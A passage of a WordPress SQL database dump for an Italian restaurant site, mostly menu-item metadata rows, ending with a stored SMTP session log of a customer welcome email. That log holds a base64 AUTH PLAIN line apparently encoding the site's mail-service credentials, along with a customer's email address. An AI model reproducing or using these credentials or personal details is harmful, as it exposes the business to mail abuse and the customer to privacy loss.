em_menu_item_parent','3762'),(44114,3928,'_menu_item_object_id','3098'),(44115,3928,'_menu_item_object','portfolio-item'),(44116,3928,'_menu_item_target',''),(44117,3928,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44118,3928,'_menu_item_xfn',''),(44119,3928,'_menu_item_url',''),(44120,3928,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44121,3928,'_menu_item_icon','null'),(44122,3929,'_menu_item_type','post_type'),(44123,3929,'_menu_item_menu_item_parent','3757'),(44124,3929,'_menu_item_object_id','2387'),(44125,3929,'_menu_item_object','page'),(44126,3929,'_menu_item_target',''),(44127,3929,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44128,3929,'_menu_item_xfn',''),(44129,3929,'_menu_item_url',''),(44130,3929,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44131,3929,'_menu_item_icon','null'),(44132,3930,'_menu_item_type','post_type'),(44133,3930,'_menu_item_menu_item_parent','3753'),(44134,3930,'_menu_item_object_id','2387'),(44135,3930,'_menu_item_object','page'),(44136,3930,'_menu_item_target',''),(44137,3930,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44138,3930,'_menu_item_xfn',''),(44139,3930,'_menu_item_url',''),(44140,3930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44141,3930,'_menu_item_icon','null'),(44142,3931,'_menu_item_type','post_type'),(44143,3931,'_menu_item_menu_item_parent','3765'),(44144,3931,'_menu_item_object_id','3075'),(44145,3931,'_menu_item_object','portfolio-item'),(44146,3931,'_menu_item_target',''),(44147,3931,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44148,3931,'_menu_item_xfn',''),(44149,3931,'_menu_item_url',''),(44150,3931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44151,3932,'_menu_item_type','post_type'),(44152,3932,'_menu_item_menu_item_parent','3732'),(44153,3932,'_menu_item_object_id','2421'),(44154,3932,'_menu_item_object','page'),(44155,3932,'_menu_item_target',''),(44156,3932,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44157,3932,'_menu_item_xfn',''),(44158,3932,'_menu_item_url',''),(44159,3932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44160,3932,'_menu_item_icon','null'),(44161,3933,'_menu_item_type','post_type'),(44162,3933,'_menu_item_menu_item_parent','3732'),(44163,3933,'_menu_item_object_id','2419'),(44164,3933,'_menu_item_object','page'),(44165,3933,'_menu_item_target',''),(44166,3933,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44167,3933,'_menu_item_xfn',''),(44168,3933,'_menu_item_url',''),(44169,3933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44170,3933,'_menu_item_icon','null'),(44171,3934,'_menu_item_type','post_type'),(44172,3934,'_menu_item_menu_item_parent','3724'),(44173,3934,'_menu_item_object_id','2421'),(44174,3934,'_menu_item_object','page'),(44175,3934,'_menu_item_target',''),(44176,3934,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44177,3934,'_menu_item_xfn',''),(44178,3934,'_menu_item_url',''),(44179,3934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44180,3934,'_menu_item_icon','null'),(44181,3935,'_menu_item_type','post_type'),(44182,3935,'_menu_item_menu_item_parent','3724'),(44183,3935,'_menu_item_object_id','2419'),(44184,3935,'_menu_item_object','page'),(44185,3935,'_menu_item_target',''),(44186,3935,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44187,3935,'_menu_item_xfn',''),(44188,3935,'_menu_item_url',''),(44189,3935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44190,3935,'_menu_item_icon','null'),(44191,3936,'_menu_item_type','post_type'),(44192,3936,'_menu_item_menu_item_parent','3726'),(44193,3936,'_menu_item_object_id','2435'),(44194,3936,'_menu_item_object','page'),(44195,3936,'_menu_item_target',''),(44196,3936,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44197,3936,'_menu_item_xfn',''),(44198,3936,'_menu_item_url',''),(44199,3936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44200,3936,'_menu_item_icon','null'),(44201,3937,'_menu_item_type','post_type'),(44202,3937,'_menu_item_menu_item_parent','3730'),(44203,3937,'_menu_item_object_id','2435'),(44204,3937,'_menu_item_object','page'),(44205,3937,'_menu_item_target',''),(44206,3937,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44207,3937,'_menu_item_xfn',''),(44208,3937,'_menu_item_url',''),(44209,3937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44210,3937,'_menu_item_icon','null'),(44211,3938,'_menu_item_type','post_type'),(44212,3938,'_menu_item_menu_item_parent','3765'),(44213,3938,'_menu_item_object_id','2435'),(44214,3938,'_menu_item_object','page'),(44215,3938,'_menu_item_target',''),(44216,3938,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44217,3938,'_menu_item_xfn',''),(44218,3938,'_menu_item_url',''),(44219,3938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44220,3939,'_menu_item_type','post_type'),(44221,3939,'_menu_item_menu_item_parent','3764'),(44222,3939,'_menu_item_object_id','1811'),(44223,3939,'_menu_item_object','page'),(44224,3939,'_menu_item_target',''),(44225,3939,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44226,3939,'_menu_item_xfn',''),(44227,3939,'_menu_item_url',''),(44228,3939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44229,3939,'_menu_item_icon','null'),(44230,3940,'_menu_item_type','post_type'),(44231,3940,'_menu_item_menu_item_parent','3764'),(44232,3940,'_menu_item_object_id','1819'),(44233,3940,'_menu_item_object','page'),(44234,3940,'_menu_item_target',''),(44235,3940,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44236,3940,'_menu_item_xfn',''),(44237,3940,'_menu_item_url',''),(44238,3940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44239,3940,'_menu_item_icon','null'),(44240,3941,'_menu_item_type','post_type'),(44241,3941,'_menu_item_menu_item_parent','3764'),(44242,3941,'_menu_item_object_id','1805'),(44243,3941,'_menu_item_object','page'),(44244,3941,'_menu_item_target',''),(44245,3941,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44246,3941,'_menu_item_xfn',''),(44247,3941,'_menu_item_url',''),(44248,3941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44249,3941,'_menu_item_icon','null'),(44250,3942,'_menu_item_type','post_type'),(44251,3942,'_menu_item_menu_item_parent','3764'),(44252,3942,'_menu_item_object_id','2448'),(44253,3942,'_menu_item_object','page'),(44254,3942,'_menu_item_target',''),(44255,3942,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44256,3942,'_menu_item_xfn',''),(44257,3942,'_menu_item_url',''),(44258,3942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44259,3942,'_menu_item_icon','null'),(44260,3943,'_menu_item_type','post_type'),(44261,3943,'_menu_item_menu_item_parent','3767'),(44262,3943,'_menu_item_object_id','2448'),(44263,3943,'_menu_item_object','page'),(44264,3943,'_menu_item_target',''),(44265,3943,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44266,3943,'_menu_item_xfn',''),(44267,3943,'_menu_item_url',''),(44268,3943,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44269,3943,'_menu_item_icon','null'),(44270,3944,'_menu_item_type','post_type'),(44271,3944,'_menu_item_menu_item_parent','3767'),(44272,3944,'_menu_item_object_id','1811'),(44273,3944,'_menu_item_object','page'),(44274,3944,'_menu_item_target',''),(44275,3944,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44276,3944,'_menu_item_xfn',''),(44277,3944,'_menu_item_url',''),(44278,3944,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44279,3944,'_menu_item_icon','null'),(44280,3945,'_menu_item_type','post_type'),(44281,3945,'_menu_item_menu_item_parent','3767'),(44282,3945,'_menu_item_object_id','1819'),(44283,3945,'_menu_item_object','page'),(44284,3945,'_menu_item_target',''),(44285,3945,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44286,3945,'_menu_item_xfn',''),(44287,3945,'_menu_item_url',''),(44288,3945,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44289,3945,'_menu_item_icon','null'),(44290,3946,'_menu_item_type','post_type'),(44291,3946,'_menu_item_menu_item_parent','3767'),(44292,3946,'_menu_item_object_id','1805'),(44293,3946,'_menu_item_object','page'),(44294,3946,'_menu_item_target',''),(44295,3946,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44296,3946,'_menu_item_xfn',''),(44297,3946,'_menu_item_url',''),(44298,3946,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44299,3946,'_menu_item_icon','null'),(44300,3947,'_menu_item_type','post_type'),(44301,3947,'_menu_item_menu_item_parent','3766'),(44302,3947,'_menu_item_object_id','2457'),(44303,3947,'_menu_item_object','page'),(44304,3947,'_menu_item_target',''),(44305,3947,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44306,3947,'_menu_item_xfn',''),(44307,3947,'_menu_item_url',''),(44308,3947,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44309,3947,'_menu_item_icon','null'),(44310,3948,'_menu_item_type','post_type'),(44311,3948,'_menu_item_menu_item_parent','3763'),(44312,3948,'_menu_item_object_id','2457'),(44313,3948,'_menu_item_object','page'),(44314,3948,'_menu_item_target',''),(44315,3948,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44316,3948,'_menu_item_xfn',''),(44317,3948,'_menu_item_url',''),(44318,3948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44319,3948,'_menu_item_icon','null'),(44320,3949,'_menu_item_type','post_type'),(44321,3949,'_menu_item_menu_item_parent','3751'),(44322,3949,'_menu_item_object_id','2477'),(44323,3949,'_menu_item_object','page'),(44324,3949,'_menu_item_target',''),(44325,3949,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44326,3949,'_menu_item_xfn',''),(44327,3949,'_menu_item_url',''),(44328,3949,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44329,3949,'_menu_item_icon','icon-star'),(44330,3949,'_menu_item_icon_pack','simple_line_icons'),(44331,3950,'_menu_item_type','post_type'),(44332,3950,'_menu_item_menu_item_parent','3755'),(44333,3950,'_menu_item_object_id','2477'),(44334,3950,'_menu_item_object','page'),(44335,3950,'_menu_item_target',''),(44336,3950,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44337,3950,'_menu_item_xfn',''),(44338,3950,'_menu_item_url',''),(44339,3950,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44340,3950,'_menu_item_icon','icon-star'),(44341,3950,'_menu_item_icon_pack','simple_line_icons'),(44342,3951,'_menu_item_type','post_type'),(44343,3951,'_menu_item_menu_item_parent','3756'),(44344,3951,'_menu_item_object_id','2494'),(44345,3951,'_menu_item_object','page'),(44346,3951,'_menu_item_target',''),(44347,3951,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44348,3951,'_menu_item_xfn',''),(44349,3951,'_menu_item_url',''),(44350,3951,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44351,3951,'_menu_item_icon','icon-star'),(44352,3951,'_menu_item_icon_pack','simple_line_icons'),(44353,3952,'_menu_item_type','post_type'),(44354,3952,'_menu_item_menu_item_parent','3756'),(44355,3952,'_menu_item_object_id','2472'),(44356,3952,'_menu_item_object','page'),(44357,3952,'_menu_item_target',''),(44358,3952,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44359,3952,'_menu_item_xfn',''),(44360,3952,'_menu_item_url',''),(44361,3952,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44362,3952,'_menu_item_icon','icon-star'),(44363,3952,'_menu_item_icon_pack','simple_line_icons'),(44364,3953,'_menu_item_type','post_type'),(44365,3953,'_menu_item_menu_item_parent','3752'),(44366,3953,'_menu_item_object_id','2494'),(44367,3953,'_menu_item_object','page'),(44368,3953,'_menu_item_target',''),(44369,3953,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44370,3953,'_menu_item_xfn',''),(44371,3953,'_menu_item_url',''),(44372,3953,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44373,3953,'_menu_item_icon','icon-star'),(44374,3953,'_menu_item_icon_pack','simple_line_icons'),(44375,3954,'_menu_item_type','post_type'),(44376,3954,'_menu_item_menu_item_parent','3752'),(44377,3954,'_menu_item_object_id','2472'),(44378,3954,'_menu_item_object','page'),(44379,3954,'_menu_item_target',''),(44380,3954,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44381,3954,'_menu_item_xfn',''),(44382,3954,'_menu_item_url',''),(44383,3954,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44384,3954,'_menu_item_icon','icon-star'),(44385,3954,'_menu_item_icon_pack','simple_line_icons'),(44386,3955,'_menu_item_type','post_type'),(44387,3955,'_menu_item_menu_item_parent','3726'),(44388,3955,'_menu_item_object_id','2627'),(44389,3955,'_menu_item_object','page'),(44390,3955,'_menu_item_target',''),(44391,3955,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44392,3955,'_menu_item_xfn',''),(44393,3955,'_menu_item_url',''),(44394,3955,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44395,3955,'_menu_item_icon','null'),(44396,3956,'_menu_item_type','post_type'),(44397,3956,'_menu_item_menu_item_parent','3726'),(44398,3956,'_menu_item_object_id','2625'),(44399,3956,'_menu_item_object','page'),(44400,3956,'_menu_item_target',''),(44401,3956,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44402,3956,'_menu_item_xfn',''),(44403,3956,'_menu_item_url',''),(44404,3956,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44405,3956,'_menu_item_icon','null'),(44406,3957,'_menu_item_type','post_type'),(44407,3957,'_menu_item_menu_item_parent','3765'),(44408,3957,'_menu_item_object_id','2627'),(44409,3957,'_menu_item_object','page'),(44410,3957,'_menu_item_target',''),(44411,3957,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44412,3957,'_menu_item_xfn',''),(44413,3957,'_menu_item_url',''),(44414,3957,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44415,3958,'_menu_item_type','post_type'),(44416,3958,'_menu_item_menu_item_parent','3765'),(44417,3958,'_menu_item_object_id','2625'),(44418,3958,'_menu_item_object','page'),(44419,3958,'_menu_item_target',''),(44420,3958,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44421,3958,'_menu_item_xfn',''),(44422,3958,'_menu_item_url',''),(44423,3958,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44424,3959,'_menu_item_type','post_type'),(44425,3959,'_menu_item_menu_item_parent','3730'),(44426,3959,'_menu_item_object_id','2627'),(44427,3959,'_menu_item_object','page'),(44428,3959,'_menu_item_target',''),(44429,3959,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44430,3959,'_menu_item_xfn',''),(44431,3959,'_menu_item_url',''),(44432,3959,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44433,3960,'_menu_item_type','post_type'),(44434,3960,'_menu_item_menu_item_parent','3730'),(44435,3960,'_menu_item_object_id','2625'),(44436,3960,'_menu_item_object','page'),(44437,3960,'_menu_item_target',''),(44438,3960,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44439,3960,'_menu_item_xfn',''),(44440,3960,'_menu_item_url',''),(44441,3960,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44442,3960,'_menu_item_icon','null'),(44443,3961,'_menu_item_type','post_type'),(44444,3961,'_menu_item_menu_item_parent','3766'),(44445,3961,'_menu_item_object_id','3065'),(44446,3961,'_menu_item_object','page'),(44447,3961,'_menu_item_target',''),(44448,3961,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44449,3961,'_menu_item_xfn',''),(44450,3961,'_menu_item_url',''),(44451,3961,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44452,3961,'_menu_item_icon','null'),(44453,3962,'_menu_item_type','post_type'),(44454,3962,'_menu_item_menu_item_parent','3766'),(44455,3962,'_menu_item_object_id','3067'),(44456,3962,'_menu_item_object','page'),(44457,3962,'_menu_item_target',''),(44458,3962,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44459,3962,'_menu_item_xfn',''),(44460,3962,'_menu_item_url',''),(44461,3962,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44462,3962,'_menu_item_icon','null'),(44463,3963,'_menu_item_type','post_type'),(44464,3963,'_menu_item_menu_item_parent','3766'),(44465,3963,'_menu_item_object_id','3066'),(44466,3963,'_menu_item_object','page'),(44467,3963,'_menu_item_target',''),(44468,3963,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44469,3963,'_menu_item_xfn',''),(44470,3963,'_menu_item_url',''),(44471,3963,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44472,3963,'_menu_item_icon','null'),(44473,3964,'_menu_item_type','post_type'),(44474,3964,'_menu_item_menu_item_parent','3763'),(44475,3964,'_menu_item_object_id','2646'),(44476,3964,'_menu_item_object','page'),(44477,3964,'_menu_item_target',''),(44478,3964,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44479,3964,'_menu_item_xfn',''),(44480,3964,'_menu_item_url',''),(44481,3964,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44482,3964,'_menu_item_icon','null'),(44483,3965,'_menu_item_type','post_type'),(44484,3965,'_menu_item_menu_item_parent','3766'),(44485,3965,'_menu_item_object_id','2646'),(44486,3965,'_menu_item_object','page'),(44487,3965,'_menu_item_target',''),(44488,3965,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44489,3965,'_menu_item_xfn',''),(44490,3965,'_menu_item_url',''),(44491,3965,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44492,3965,'_menu_item_icon','null'),(44493,3966,'_menu_item_type','post_type'),(44494,3966,'_menu_item_menu_item_parent','3728'),(44495,3966,'_menu_item_object_id','2652'),(44496,3966,'_menu_item_object','page'),(44497,3966,'_menu_item_target',''),(44498,3966,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44499,3966,'_menu_item_xfn',''),(44500,3966,'_menu_item_url',''),(44501,3966,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44502,3966,'_menu_item_icon','null'),(44503,3967,'_menu_item_type','post_type'),(44504,3967,'_menu_item_menu_item_parent','3722'),(44505,3967,'_menu_item_object_id','2652'),(44506,3967,'_menu_item_object','page'),(44507,3967,'_menu_item_target',''),(44508,3967,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44509,3967,'_menu_item_xfn',''),(44510,3967,'_menu_item_url',''),(44511,3967,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44512,3967,'_menu_item_icon','null'),(44513,3968,'_menu_item_type','post_type'),(44514,3968,'_menu_item_menu_item_parent','3763'),(44515,3968,'_menu_item_object_id','2843'),(44516,3968,'_menu_item_object','page'),(44517,3968,'_menu_item_target',''),(44518,3968,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44519,3968,'_menu_item_xfn',''),(44520,3968,'_menu_item_url',''),(44521,3968,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44522,3968,'_menu_item_icon','null'),(44523,3969,'_menu_item_type','post_type'),(44524,3969,'_menu_item_menu_item_parent','3766'),(44525,3969,'_menu_item_object_id','2843'),(44526,3969,'_menu_item_object','page'),(44527,3969,'_menu_item_target',''),(44528,3969,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44529,3969,'_menu_item_xfn',''),(44530,3969,'_menu_item_url',''),(44531,3969,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44532,3969,'_menu_item_icon','null'),(44533,3970,'_menu_item_type','post_type'),(44534,3970,'_menu_item_menu_item_parent','3763'),(44535,3970,'_menu_item_object_id','2857'),(44536,3970,'_menu_item_object','page'),(44537,3970,'_menu_item_target',''),(44538,3970,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44539,3970,'_menu_item_xfn',''),(44540,3970,'_menu_item_url',''),(44541,3970,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44542,3970,'_menu_item_icon','null'),(44543,3971,'_menu_item_type','post_type'),(44544,3971,'_menu_item_menu_item_parent','3766'),(44545,3971,'_menu_item_object_id','2857'),(44546,3971,'_menu_item_object','page'),(44547,3971,'_menu_item_target',''),(44548,3971,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44549,3971,'_menu_item_xfn',''),(44550,3971,'_menu_item_url',''),(44551,3971,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44552,3971,'_menu_item_icon','null'),(44562,3972,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(44563,3972,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<franzoni.elena@gmail.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: franzoni.elena@gmail.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <521ada10d245e46233d07e09b32ead07@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Wed, 20 Jan 2021 17:27:30 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi franzoni.elena,</p>=0A<p style=3D\"marg=\r\nin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your usernam=\r\ne is <strong>franzoni.elena</strong>. You can access your account area t=\r\no view orders, change your password, and more at: <a href=3D\"https://www=\r\n..ristorantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #55=\r\n7da1; font-weight: normal; text-decoration: underline;\">https://www.rist=\r\norantesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;=\r\n\">We look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</t=\r\nd>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- En=\r\nd Content -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=\r\n=09=09=09=09=09=09<!-- End Body 